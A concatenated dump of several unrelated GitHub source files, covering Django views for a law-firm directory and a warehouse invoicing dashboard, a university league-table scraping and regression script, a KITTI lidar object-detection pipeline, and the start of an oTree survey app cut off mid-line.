if len(ans) == 0:\n ans += \"criminal-lawyers\"\n advocates = Advocatefin.objects.filter(type=ans)\n\n return render(request, 'lawyerCard.html', {'Lawyers': advocates})\n \n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error.html', {'error_message': error_message}, status=500)\n \n return render(request, 'problem.html')\n\n # return render(request, 'your_form_template.html')\n\n\ndef advocates_by_type(request, advocate_type):\n advocates = Advocatefin.objects.filter(type=advocate_type)\n return render(request, 'lawyerCard.html', {'Lawyers': advocates})\ndef advocates_by_id(request,id1):\n advocates = Advocatefin.objects.filter(pk=id1)\n for l in advocates:\n l.type=l.practice_area_skills\n return render(request, 'lawyerCard.html', {'Lawyers': advocates})\n\n\ndef searchlawyer(request):\n # print(-1)\n if request.method == \"POST\":\n search_query = request.POST.get(\"searchval\")\n # print(search_query)\n advocates = Advocatefin.objects.filter(name__icontains=search_query)\n context={\n\n }\n if len(advocates) ==0:\n context['Lawyers']=advocates\n context['cn']=len(advocates)\n else:\n l11=[]\n l11.append(advocates[0])\n context['Lawyers']=l11\n context['cn']=len(advocates)\n\n \n \n return render(request, 'lawyerCard.html', context)\n else:\n lawyer=Laweruser.objects.all()\n\n # logout(request)\n context = {\n # 'lawyer':lawyer,\n 'lawyer':lawyer\n\n }\n names_to_exclude = [\"Advocate Raman Jain\",\"Advocate Hemant Kumar Joshi\"]\n distinct_names = Advocatefin.objects.exclude(name__in=names_to_exclude).values('name').distinct().order_by('-rating')[:6]\n advocates_list = []\n\n for name_dict in distinct_names:\n name = name_dict['name']\n advocate = Advocatefin.objects.filter(name=name).first() # Assuming there's only one advocate with a given name\n if advocate:\n advocates_list.append(advocate)\n # # print(type(advocates))\n # # print(advocates_list)\n # 'Lawyers': advocates\n context['Lawyers']=advocates_list\n context['cn']=5\n return render(request, 'index2.html',context)\n \n\ndef somebestadvocates(request):\n\n lawyer=Laweruser.objects.all()\n # logout(request)\n context = {\n # 'lawyer':lawyer,\n 'lawyer':lawyer\n }\n names_to_exclude = [\"Advocate Raman Jain\",\"Advocate Hemant Kumar Joshi\"]\n distinct_names = Advocatefin.objects.exclude(name__in=names_to_exclude).values('name').distinct().order_by('-rating')[:6]\n advocates_list = []\n\n for name_dict in distinct_names:\n name = name_dict['name']\n advocate = Advocatefin.objects.filter(name=name).first() \n if advocate:\n advocates_list.append(advocate)\n\n # # print(type(advocates))\n # # print(advocates_list)\n # 'Lawyers': advocates\n context['Lawyers']=advocates_list\n return render(request, 'somebestadvocates.html',context)\n\ndef Arbitrators_Mediators(request):\n try:\n advocates = Aribitration_mediator.objects.all()\n return render(request, 'Arbitrators_Mediators.html', {'Lawyers': advocates})\n except Aribitration_mediator.DoesNotExist:\n return render(request, 'error.html', {'error_message': 'No lawyers found.'})\n except Exception as e:\n return render(request, 'error.html', {'error_message': f\"An error occurred: {e}\"})\n\n\n\n\n \n\n\n\n \n \n\n\n\n\n\n\n","repo_name":"Shubhamkumarroy/LawFirm","sub_path":"myprojectapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":41361,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"16312385505","text":"from django.shortcuts import reverse, redirect, render, get_object_or_404\nfrom django.urls import reverse_lazy\nfrom django.views.generic import ListView, UpdateView, CreateView\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.db.models import Sum\nfrom django.contrib import messages\nfrom .models import Invoice, InvoiceOrderItem, InvoiceImage, VendorPaycheck\nfrom catalogue.models import Product\nfrom catalogue.product_details import Vendor\nfrom catalogue.forms import VendorForm\nfrom site_settings.constants import CURRENCY\nfrom .forms import CreateInvoiceForm, UpdateInvoiceForm, CreateOrderItemForm, InvoiceImageForm, CopyInvoiceForm, InvoiceAttributeCreateOrEditForm\nfrom .tables import InvoiceImageTable, InvoiceTable, VendorTable, ProductAddTable, VendorOrderTable, VendorProductReportTable, VendorWarehouseMovementTable\n\nfrom django_tables2 import RequestConfig\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass WarehouseOrderList(ListView):\n model = Invoice\n template_name = 'dashboard/list_page.html'\n paginate_by = 50\n\n def get_queryset(self):\n queryset = Invoice.objects.all()\n queryset = Invoice.filter_data(self.request, queryset)\n return queryset\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n queryset_table = InvoiceTable(self.object_list)\n RequestConfig(self.request).configure(queryset_table)\n vendors = Vendor.objects.filter(active=True)\n vendor_filter = True\n page_title, create_url, back_url = 'Τιμολόγια', reverse('warehouse:create_invoice'), reverse('warehouse:dashboard')\n context.update(locals())\n return context\n\n\n@staff_member_required\ndef create_warehouse_order_view(request):\n form = CreateInvoiceForm(request.POST or None)\n form_title = 'Create New Invoice'\n back_url = reverse('warehouse:invoices')\n if form.is_valid():\n instance = form.save()\n return redirect(instance.get_edit_url())\n\n return render(request, 'dashboard/form.html', locals())\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass UpdateWarehouseOrderView(UpdateView):\n model = Invoice\n template_name = 'warehouse/order_detail.html'\n form_class = UpdateInvoiceForm\n success_url = reverse_lazy('warehouse:invoices')\n\n def get_success_url(self):\n return reverse('warehouse:update_order', kwargs={'pk':self.kwargs['pk']})\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n back_url = reverse('warehouse:invoices')\n if self.object.order_type in ['4', '5']:\n qs = Product.my_query.active_warehouse()\n else:\n qs = Product.my_query.active().filter(vendor=self.object.vendor)\n products_table = ProductAddTable(qs)\n instance = self.object\n images = InvoiceImage.objects.filter(order_related=self.object)\n images_table = InvoiceImageTable(images)\n RequestConfig(self.request).configure(images_table)\n RequestConfig(self.request).configure(products_table)\n context.update(locals())\n return context\n\n\n@staff_member_required\ndef check_if_product_have_attr_view(request, pk, dk):\n product = get_object_or_404(Product, id=dk)\n instance = get_object_or_404(Invoice, id=pk)\n qs = InvoiceOrderItem.objects.filter(order=instance, product=product)\n if qs.exists():\n messages.warning(request, 'Η καταχώρηση υπάρχει ήδη.')\n return redirect(instance.get_edit_url())\n if product.have_attr:\n return redirect(reverse('warehouse:create_order_item_with_attr', kwargs={'pk': pk, 'dk': dk}))\n return redirect(reverse('warehouse:create-order-item', kwargs={'pk': pk, 'dk': dk}))\n\n\n@staff_member_required\ndef create_order_item_with_attribute_view(request, pk, dk):\n instance = get_object_or_404(Invoice, id=pk)\n product = get_object_or_404(Product, id=dk)\n\n attr_qs = product.attr_class.filter(class_related__have_transcations=True)\n attr_class = attr_qs.first() if attr_qs.exists() else None\n class_attribute = attr_qs.first().class_related if attr_qs.exists() else None\n class_items = class_attribute.my_values.all()\n\n qs_order_item = InvoiceOrderItem.objects.filter(order=instance, product=product)\n\n order_item_qs = InvoiceOrderItem.objects.filter(product=product, order=instance)\n order_item = order_item_qs.first() if order_item_qs.exists() else None\n selected_data = order_item.my_attributes.all() if order_item else []\n # form data\n form = InvoiceAttributeCreateOrEditForm(initial={'value': product.price_buy,\n 'discount': product.order_discount,\n 'measure_unit': product.measure_unit,\n 'order_code': product.order_code\n })\n form_data = (order_item.value, order_item.discount_value) if order_item else (0, 0)\n return render(request, 'dashboard/form_with_attr.html', context=locals())\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass CreateOrderItem(CreateView):\n model = InvoiceOrderItem\n form_class = CreateOrderItemForm\n template_name = 'dashboard/form.html'\n\n def get_success_url(self):\n return reverse('warehouse:update_order', kwargs={'pk': self.kwargs['pk']})\n\n def get_initial(self):\n self.instance = get_object_or_404(Invoice, id=self.kwargs['pk'])\n self.product = get_object_or_404(Product, id=self.kwargs['dk'])\n initial = super().get_initial()\n initial['order'] = self.instance\n initial['product'] = self.product\n initial['sku'] = self.product.order_code\n initial['value'] = self.product.price_buy\n initial['discount_value'] = self.product.order_discount\n return initial\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n form_title = f'Add {self.product} to {self.instance}'\n back_url, delete_url = self.get_success_url(), None\n context.update(locals())\n return context\n\n def form_valid(self, form):\n form.save()\n return super().form_valid(form)\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass UpdateInvoiceOrderItem(UpdateView):\n model = InvoiceOrderItem\n form_class = CreateOrderItemForm\n template_name = 'dashboard/form.html'\n\n def get_success_url(self):\n return reverse('warehouse:update_order', kwargs={'pk': self.object.order.id})\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n form_title = f'Edit {self.object}'\n back_url, delete_url = self.get_success_url(), reverse('warehouse:order-item-delete', kwargs={'pk': self.object.id})\n context.update(locals())\n return context\n\n\n@staff_member_required\ndef delete_warehouse_order_item_view(request, pk):\n instance = get_object_or_404(InvoiceOrderItem, id=pk)\n instance.delete()\n return redirect(reverse('warehouse:update_order', kwargs={'pk': instance.order.id}))\n\n\n@staff_member_required\ndef delete_warehouse_order_view(request, pk):\n instance = get_object_or_404(Invoice, id=pk)\n instance.delete()\n return redirect(reverse('warehouse:invoices'))\n\n\n@staff_member_required\ndef create_copy_invoice_view(request, pk):\n instance = get_object_or_404(Invoice, id=pk)\n form = CopyInvoiceForm(request.POST or None)\n if form.is_valid():\n date_expired = form.cleaned_data.get('date_expired', None)\n order_type = form.cleaned_data.get('order_type', None)\n if date_expired and order_type:\n new_invoice = Invoice.objects.create(\n order_type=order_type,\n date_expired=date_expired,\n vendor=instance.vendor,\n is_paid=instance.is_paid,\n payment_method=instance.payment_method,\n taxes_modifier=instance.taxes_modifier,\n\n )\n for item in instance.order_items.all():\n InvoiceOrderItem.objects.create(\n order=new_invoice,\n product=item.product,\n qty=item.qty,\n value=item.value,\n discount_value=item.discount_value\n )\n return redirect(new_invoice.get_edit_url())\n form_title, back_url = f'Αντιγραφή...', instance.get_edit_url()\n context = locals()\n return render(request, 'dashboard/form.html', context=context)\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass VendorListView(ListView):\n model = Vendor\n template_name = 'dashboard/list_page.html'\n paginate_by = 50\n\n def get_queryset(self):\n queryset = Vendor.objects.all()\n queryset = Vendor.filter_data(self.request, queryset)\n return queryset\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n queryset_table = VendorTable(self.object_list)\n create_url, back_url, page_title = reverse('warehouse:vendor_create'), reverse('dashboard:home'), 'Προμηθευτές'\n RequestConfig(self.request).configure(queryset_table)\n context.update(locals())\n return context\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass VendorCreateView(CreateView):\n model = Vendor\n form_class = VendorForm\n template_name = 'dashboard/form.html'\n success_url = reverse_lazy('warehouse:vendors')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n back_url, delete_url = self.success_url, None\n form_title = 'Create new Vendor'\n context.update(locals())\n return context\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass VendorUpdateView(UpdateView):\n model = Vendor\n form_class = VendorForm\n template_name = 'dashboard/form.html'\n success_url = reverse_lazy('warehouse:vendors')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n back_url, delete_url = reverse('warehouse:vendors'), reverse('warehouse:vendor_delete', kwargs={'pk': self.kwargs['pk']})\n form_title = f'Edit {self.object}'\n context.update(locals())\n return context\n\n\n@staff_member_required\ndef delete_vendor(request, pk):\n instance = get_object_or_404(Vendor, id=pk)\n instance.delete()\n return redirect(reverse('warehouse:vendors'))\n\n\n@staff_member_required\ndef vendor_report_view(request, pk):\n vendor = get_object_or_404(Vendor, id=pk)\n invoices = vendor.vendor_orders.all()\n products = vendor.product_set.all()\n warehouse_movements = InvoiceOrderItem.objects.filter(product__in=products)\n products_table = VendorProductReportTable(products)\n invoices_table = VendorOrderTable(invoices)\n warehouse_movements_table = VendorWarehouseMovementTable(warehouse_movements)\n RequestConfig(request, paginate={'per_page': 10}).configure(invoices_table)\n RequestConfig(request, paginate={'per_page': 10}).configure(products_table)\n RequestConfig(request, paginate={'per_page': 10}).configure(warehouse_movements_table)\n context = locals()\n return render(request, 'warehouse/vendor_report_page.html', context)\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass CreateInvoiceImageView(CreateView):\n model = InvoiceImage\n form_class = InvoiceImageForm\n template_name = 'dashboard/form.html'\n\n def get_success_url(self):\n return reverse('warehouse:update_order', kwargs={'pk': self.kwargs['pk']})\n\n def get_initial(self):\n initial = super().get_initial()\n order = get_object_or_404(Invoice, id=self.kwargs['pk'])\n initial['order_related'] = order\n return initial\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n form_title = 'Create new Image'\n back_url, delete_url = self.get_success_url(), None\n context.update(locals())\n return context\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass UpdateInvoiceImageView(UpdateView):\n model = InvoiceImage\n form_class = InvoiceImageForm\n template_name = 'dashboard/form.html'\n\n def get_success_url(self):\n return reverse('warehouse:update_order', kwargs={'pk': self.object.order_related.id})\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n form_title = f'Edit {self.object}'\n back_url, delete_url = self.get_success_url(), reverse('warehouse:delete-order-image', kwargs={'pk': self.object.id})\n context.update(locals())\n return context\n\n\n@staff_member_required\ndef delete_invoice_image_view(request, pk):\n instance = get_object_or_404(InvoiceImage, id=pk)\n instance.delete()\n return redirect(reverse('warehouse:update_order', kwargs={'pk': instance.order_related.id}))\n\n\n\n","repo_name":"Zefarak/shop_manager","sub_path":"warehouse/invoice_views.py","file_name":"invoice_views.py","file_ext":"py","file_size_in_byte":13148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70646458495","text":"# This program attempts to find any link / correlation between the entry standards of universities, and the graduate prospects of students after leaving uni\n# The obvious hypothesis is that universities with greater entry requirements will get better graduate standards, since good students coming in are probably going\n# to be good students coming out of uni (and vice versa in the general case)\n\n# As a bonus, I'll also add student satisfaction as the colour dimension so maybe there's a correlation there too? The better students are happier/more miserable?\n\nimport requests as rq\nfrom bs4 import BeautifulSoup as BS\n\n# Beep boop. I'm a human.\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0'\n}\n\n# Ditto ^\nparams = {\n 'sort': 'dd',\n 'filter': 'reviews-dd',\n 'res_id': 18439027\n}\n\n# I only understand pixels. A pixel is 1/96 of an inch apparently\npx = 1/96\n\n# Parse the incoming data\nget_the_data = rq.get(\"https://www.thecompleteuniversityguide.co.uk/league-tables/rankings/computer-science\", headers=headers).text\nsoup = BS(get_the_data, \"html.parser\")\n\n# Find the league tables themselves, this seeming gibberish is actually the tags required to find them\ntables = soup.find(\"div\" , {\"class\" : \"tabl_wrap clr tabl_div\"}).find(\"div\" , {\"class\" : \"rgt_col swiper-container swiper-container-initialized swiper-container-horizontal\"})\n\n# The tables are organised so thaat rt_list(x) is just the (x+1)th column on the table, so easy to read from\n# They're all given the class of \"col_one\"\n\n# Each element in these lists is actually just a tag, we need to extract the actual percentage from the tag using an element-wise function\n# The ordering of this data is important, because entry_standards_data[i] is supposed to be mapped to grad_prospects_data[i] and student_satisfaction_data[i]\n# So a change in the ordering of a list could result in data mismatches which would wipe out the data\nentry_standards_data = tables.find(\"li\" , {\"class\" : \"swiper-slide rt_list2 swiper-slide-next\"}).find_all(\"div\" , {\"class\" : \"col_one\"})\nstudent_satisfaction_data = tables.find(\"li\" , {\"class\" : \"swiper-slide rt_list3\"}).find_all(\"div\" , {\"class\" : \"col_one\"})\ngrad_prospects_data = tables.find(\"li\" , {\"class\" : \"swiper-slide rt_list6\"} ).find_all(\"div\" , {\"class\" : \"col_one\"})\n\n# And that function is this one\n# Converts tag to the numerical value\ndef convert(x):\n # If the data is N/A then it will not be possible to get the numerical data\n try:\n # This long complicated expression just extracts the string % value, kills the % at the end and casts to an int (always int percentages)\n return int( x.find(\"span\" , {\"class\" : \"smtxt\"}).text[:-1:])\n except:\n # If data is N/A then just return -1 to make it obvious\n return -1\n \n# It's graphin' time. (graphs all over the place)\n \nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport matplotlib.colors as mcolors\n\n# Darkred - yellow - lime/green, a colourmap I took from EU4\nmy_cmap=mcolors.LinearSegmentedColormap.from_list('rg',[\"darkred\", \"yellow\", \"lime\"], N=256) \n\n# This converts the obtained data into integer form so it can be plotted - order is preserved\nentry_standards = [ convert(x) for x in entry_standards_data] \nstudent_satisfaction = [ convert(x) for x in student_satisfaction_data]\ngrad_prospects = [ convert(x) for x in grad_prospects_data] \n\n# This section of code removes any data points which have N/A values since this would skew our graph with anomalous results\n# If a data point has an N/A datapoint, we also need to delete the corresponding 2 other pieces of data (student satisfaction, grad_prospects for example)\n# So that no piece of data on the x-axis doesn't have a value to be mapped to\nfor i,v in enumerate(entry_standards):\n if entry_standards[i] == -1 or grad_prospects[i] == -1 or student_satisfaction[i] == -1:\n # If any N/A data, delete them all!\n entry_standards.remove(v)\n grad_prospects.remove(grad_prospects[i])\n student_satisfaction.remove(student_satisfaction[i])\n\n# Since student satisfaction is quite universally 80-90% ish, we need to code the data so that min =0, max =100 so that we can see some proper colour contrast\nmin_satisfaction = min(student_satisfaction)\nmax_satisfaction = max(student_satisfaction)\n\n# This coding formula will accomplish this goal for us\nstudent_satisfaction = [ ( x - min_satisfaction ) * (100 / (max_satisfaction-min_satisfaction)) for x in student_satisfaction]\n\n# The following data will be used to calculate the coefficients of our regression line (y=mx+b) and the PMCC (r) to determine the strength of the correlation\n# If you want to understand this, learn stats, this is just copying the mathematical formulae\n\n# This is all the data we need to calculate m,b and r\nn=len(grad_prospects)\nxy_sum = sum( [ entry_standards[i] * grad_prospects[i] for i in range(n)] )\nx_sum =sum(entry_standards)\ny_sum = sum(grad_prospects)\nx_2_sum = sum([ x*x for x in entry_standards] )\navg_x = x_sum / n\navg_y = y_sum / n\n\n# Using the formulas and the above parameters to determine the values of the coefficients m, b and r\nm = (n * xy_sum - x_sum * y_sum) / (n * x_2_sum - (x_sum)**2 )\nb = (y_sum - m * x_sum) / n\nr = ( sum( [ ( entry_standards[i] - avg_x ) * ( grad_prospects[i] - avg_y ) for i in range(n) ] ) \n / ( sum( [( entry_standards[i] - avg_x ) ** 2 for i in range(n) ] ) * ( sum( [( grad_prospects[i] - avg_y ) ** 2 for i in range(n) ] ) ) ) ** 0.5 )\n\n# This np array will be the x-axis for our regression line\nx = np.arange(0,101)\n\n\n# Generating the plots\nfig, ax = plt.subplots(figsize=(1920*px, 1080*px))\n\n# Grid so easier to see and understand\nplt.grid(True)\n\n# We need to see the variance from 0-100%, so I set the limits to be from 0-100%\nplt.xlim(0,100)\nplt.ylim(0,100)\n\n# Plot the results\nthe_scatter_plot = ax.scatter(entry_standards, \n grad_prospects, \n s=32, edgecolor=\"black\", \n c=student_satisfaction, \n cmap=my_cmap,\n label=\"Results\")\n\n# Plot the regression line with the label explaining what the coefficients are, limit to reasonable number of decimal places\nthe_approx = ax.plot(x, m*x + b, label=f\"y = {m:.2f}x + {b:.2f}, r = {r:.3f}\")\n\nplt.title(\"Entry standards vs Graduate prospects (Computer Science)\")\n\nplt.xlabel(\"Entry standards (0-100)\")\nplt.ylabel(\"Graduate prospects (0-100)\")\nplt.colorbar(mappable=the_scatter_plot, extend=\"both\",label=\"Student satisfaction (coded: min = 0, max = 100) \")\n\nplt.legend()\nplt.savefig(\"here\")\n# plt.show()\n","repo_name":"david-git-acc/repos_1","sub_path":"attempt 1.py","file_name":"attempt 1.py","file_ext":"py","file_size_in_byte":6693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10391534027","text":"#!/opt/conda/envs/kitti-detection-pipeline/bin/python\n\n# detect.py\n# 1. read Velodyne point cloud measurements\n# 2. perform ground and object segmentation on point cloud\n# 3. predict object category using classification network\n\nimport os\nimport glob\nimport argparse\nimport sys\nimport progressbar\nimport datetime\n\nsys.path.insert(0, './')\n# disable TF log display:\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n# utils:\nimport utils.velodyne as measurement\nimport utils.visualization as visualization\nimport utils.kitti as output\n# segmentation:\nimport segmentation\n# prediction:\nfrom preprocess import KITTIPCDClassificationDataset\nimport numpy as np\nimport scipy.spatial\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom models.cls_msg_model import CLS_MSG_Model\nfrom models.cls_ssg_model import CLS_SSG_Model\n\ntf.random.set_seed(1234)\n\n# open3d:\nimport open3d as o3d\n\ndef load_model(config):\n \"\"\"\n Load pre-trained object classification network\n \n \"\"\"\n # init model:\n if config['msg'] == True:\n model = CLS_MSG_Model(config['batch_size'], config['num_classes'], config['batch_normalization'])\n else:\n model = CLS_SSG_Model(config['batch_size'], config['num_classes'], config['batch_normalization'])\n\n # load params:\n model.load_weights(config['checkpoint_path'])\n\n return model\n\ndef preprocess(\n segmented_objects, object_ids,\n config\n):\n \"\"\"\n Preprocess for classification network\n \"\"\"\n # parse config:\n points = np.asarray(segmented_objects.points)\n normals = np.asarray(segmented_objects.normals)\n num_objects = max(object_ids) + 1\n\n # result:\n X = []\n y = []\n for object_id in range(num_objects):\n # 1. only keep object with enough number of observations:\n if ((object_ids == object_id).sum() <= 4):\n continue\n \n # 2. only keep object within max radius distance:\n object_center = np.mean(points[object_ids == object_id], axis=0)[:2]\n if (np.sqrt((object_center*object_center).sum()) > config['max_radius_distance']):\n continue\n \n # 3. resample:\n points_ = np.copy(points[object_ids == object_id])\n normals_ = np.copy(normals[object_ids == object_id])\n N, _ = points_.shape\n\n weights = scipy.spatial.distance.squareform(\n scipy.spatial.distance.pdist(points_, 'euclidean')\n ).mean(axis = 0)\n weights /= weights.sum()\n \n idx = np.random.choice(\n np.arange(N), \n size = (config['num_sample_points'], ), replace=True if config['num_sample_points'] > N else False,\n p = weights\n )\n\n # 4. translate to zero-mean:\n points_processed, normals_processed = points_[idx], normals_[idx]\n points_processed -= points_.mean(axis = 0)\n\n # format as numpy.ndarray:\n X.append(\n np.hstack(\n (points_processed, normals_processed)\n )\n )\n y.append(object_id)\n\n # format as tf dataset:\n X = np.asarray(X)\n y = np.asarray(y)\n\n # pad to batch size:\n N = len(y)\n if (N % config['batch_size'] != 0):\n num_repeat = config['batch_size'] - N % config['batch_size']\n\n X = np.vstack(\n (\n X, \n np.repeat(\n X[0], num_repeat, axis=0\n ).reshape(\n (-1, config['num_sample_points'], 6)\n )\n )\n )\n y = np.hstack(\n (y, np.repeat(y[0], num_repeat))\n )\n\n # format as tensorflow dataset:\n dataset = tf.data.Dataset.from_tensor_slices(\n (\n tf.convert_to_tensor(X, dtype=tf.float32), \n tf.convert_to_tensor(y, dtype=tf.int64)\n )\n )\n dataset = dataset.batch(batch_size=config['batch_size'], drop_remainder=True)\n\n return dataset, N\n\n\ndef predict(segmented_objects, object_ids, model, config):\n \"\"\" \n Load classification network and predict surrounding object category\n\n Parameters\n ----------\n config: dict \n Model training configuration\n\n \"\"\"\n # prepare data:\n dataset, N = preprocess(segmented_objects, object_ids, config)\n\n # make predictions:\n predictions = {\n class_id: {} for class_id in range(config['num_classes'])\n }\n num_predicted = 0\n\n for X, y in dataset:\n # predict:\n prob_preds = model(X)\n ids = y.numpy()\n\n # add to prediction:\n for (object_id, class_id, confidence) in zip(\n # object ID:\n ids,\n # category:\n np.argmax(prob_preds, axis=1),\n # confidence:\n np.max(prob_preds, axis=1)\n ):\n predictions[class_id][object_id] = confidence\n num_predicted += 1\n \n # skip padded instances:\n if (num_predicted == N):\n break\n\n return predictions\n\ndef detect(\n dataset_dir, index,\n max_radius_distance, num_sample_points,\n debug_mode\n):\n # 0. generate I/O paths:\n input_velodyne = os.path.join(dataset_dir, 'velodyne', f'{index:06d}.bin')\n input_params = os.path.join(dataset_dir, 'calib', f'{index:06d}.txt')\n output_label = os.path.join(dataset_dir, 'shenlan_pipeline_pred_2', 'data', f'{index:06d}.txt')\n\n # 1. read Velodyne measurements and calib params:\n point_cloud = measurement.read_measurements(input_velodyne)\n param = measurement.read_calib(input_params)\n\n # 2. segment ground and surrounding objects -- here discard intensity channel:\n segmented_ground, segmented_objects, object_ids = segmentation.segment_ground_and_objects(point_cloud[:, 0:3])\n\n # 3. predict object category using classification network:\n config = {\n # preprocess:\n 'max_radius_distance': max_radius_distance,\n 'num_sample_points': num_sample_points,\n # predict:\n 'msg' : True,\n 'batch_size' : 16,\n 'num_classes' : 4,\n 'batch_normalization' : False,\n 'checkpoint_path' : 'logs/msg_1/model/weights.ckpt',\n }\n model = load_model(config)\n predictions = predict(segmented_objects, object_ids, model, config)\n \n # TODO: refactor decoder implementation\n decoder = KITTIPCDClassificationDataset(input_dir='/workspace/data/kitti_3d_object_classification_normal_resampled').get_decoder()\n\n # debug mode:\n if (debug_mode):\n # print detection results:\n for class_id in predictions:\n # show category:\n print(f'[{decoder[class_id]}]')\n # show instances:\n for object_id in predictions[class_id]:\n print(f'\\t[Object ID]: {object_id}, confidence {predictions[class_id][object_id]:.2f}')\n\n # visualize:\n bounding_boxes = visualization.get_bounding_boxes(\n segmented_objects, object_ids, \n predictions, decoder\n )\n o3d.visualization.draw_geometries(\n [segmented_ground, segmented_objects] + bounding_boxes\n )\n \n # 4. format output for KITTI offline evaluation tool:\n label = output.to_kitti_eval_format(\n segmented_objects, object_ids, param,\n predictions, decoder\n )\n label.to_csv(output_label, sep=' ', header=False, index=False)\n\ndef get_arguments():\n \"\"\" \n Get command-line arguments\n\n \"\"\"\n # init parser:\n parser = argparse.ArgumentParser(\"Perform two-stage object detection on KITTI dataset.\")\n\n # add required and optional groups:\n required = parser.add_argument_group('Required')\n optional = parser.add_argument_group('Optional')\n\n # add required:\n required.add_argument(\n \"-i\", dest=\"input\", help=\"Input path.\",\n required=True, type=str\n )\n\n optional.add_argument(\n \"-d\", dest=\"debug_mode\", help=\"When enabled, visualize the result. Defaults to False. \\n\",\n required=False, type=bool, default=False\n )\n optional.add_argument(\n \"-r\", dest=\"max_radius_distance\", help=\"Maximum radius distance between object and Velodyne lidar. \\nUsed for ROI definition. Defaults to 25.0. \\nONLY used in 'generate' mode.\",\n required=False, type=float, default=25.0\n )\n optional.add_argument(\n \"-n\", dest=\"num_sample_points\", help=\"Number of sample points to keep for each object. \\nDefaults to 64. \\nONLY used in 'generate' mode.\",\n required=False, type=int, default=64\n )\n\n # parse arguments:\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n # parse command line arguments\n args = get_arguments()\n\n for label in progressbar.progressbar(\n glob.glob(\n os.path.join(args.input, 'shenlan_pipeline_label_2', '*.txt')\n )\n ):\n # get index:\n index = int(\n os.path.splitext(\n os.path.basename(label)\n )[0]\n )\n\n # perform object detection:\n detect(\n args.input, index,\n args.max_radius_distance, args.num_sample_points,\n args.debug_mode\n )\n","repo_name":"AlexGeControl/3D-Point-Cloud-Analytics","sub_path":"workspace/assignments/project-01-kitti-detection-pipeline/pointnet++/detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":9059,"program_lang":"python","lang":"en","doc_type":"code","stars":235,"dataset":"github-code","pt":"79"} +{"seq_id":"70187759297","text":"from otree.api import *\nimport math\n\ndoc = \"\"\"\nYour app description\n\"\"\"\n\n\nclass C(BaseConstants):\n NAME_IN_URL = 'Demographics'\n PLAYERS_PER_GROUP = None\n NUM_ROUNDS = 1\n\n\nclass Subsession(BaseSubsession):\n pass\n\n\nclass Group(BaseGroup):\n pass\n\n\nclass Player(BasePlayer):\n age = models.IntegerField(min=16, max=110, label=\"Wie alt sind Sie?\")\n geschlecht = models.IntegerField(\n label=\"Geschlecht:\",\n choices=[\n [1, 'Männlich'],\n [2, 'Weiblich'],\n [3, 'Anderes'],\n [3, 'Keine Angabe'],\n ],\n )\n bildungsgrad = models.IntegerField(\n label=\"Höchster Bildungsabschluss:\",\n choices=[\n [1, 'Abitur'],\n [2, 'Bachelor'],\n [3, 'Diplom'],\n [4, 'Master'],\n [5, 'PhD'],\n [6, 'Sonstiges'],\n ],\n )\n\n gehaltene_anlageprodukte = models.IntegerField(\n label=\"Wie viele verschiedene Anlageprodukte (z.B. Aktien, Fonds, Anleihen, Zertifikate) haben Sie innerhalb des letzten Jahres gehalten?\",\n choices=[\n [1, '0'],\n [2, '1-5'],\n [3, '6-10'],\n [4, 'Mehr als 10'],\n [5, 'Weiß ich nicht'],\n ],\n )\n\n beschäftigungsstatus = models.IntegerField(\n label=\"Derzeitiger Beschäftigungsstatus:\",\n choices=[\n [1, 'Vollzeit'],\n [2, 'Teilzeit'],\n [3, 'Vollzeitstudent'],\n [4, 'Weder beschäftigt noch Student'],\n ],\n )\n # check these\n \n field_of_studies = models.StringField(label='Was ist/war Ihre Hauptrichtung im Studium?')\n\n# FUNCTIONS\ndef round_up_to_next_20_cents(value):\n return math.ceil(value * 5) / 5\n\n\n# PAGES\nclass Demographics(Page):\n form_model = 'player'\n form_fields = ['age', 'geschlecht', 'bildungsgrad', 'gehaltene_anlageprodukte', 'beschäftigungsstatus', \"field_of_studies\"]\n\nclass Payoff(Page):\n def vars_for_template(player: Player):\n part = player.participant\n return {\n 'pay_exp': part.vars.get('exp_to_pay', 0),\n 'exp1_pay_round': part.vars.get('round_to_pay', 0),\n 'exp1_pay_ecu': part.vars.get('exp1_pay_ecu', 0),\n 'exp1_pay_eur': round(part.vars.get('exp1_pay_ecu', 0) / 10, 2),\n 'exp2_task': part.vars.get('exp2_task', 0),\n 'banks2_round': part.vars.get('banks2_round_to_pay', 0),\n 'banks2_coinflip': part.vars.get('banks2_coinflip', None),\n 'banks5_round': part.vars.get('banks5_round_to_pay', 0),\n 'banks5_coinflip': part.vars.get('banks5_coinflip', None),\n 'exp2_pay_ecu': 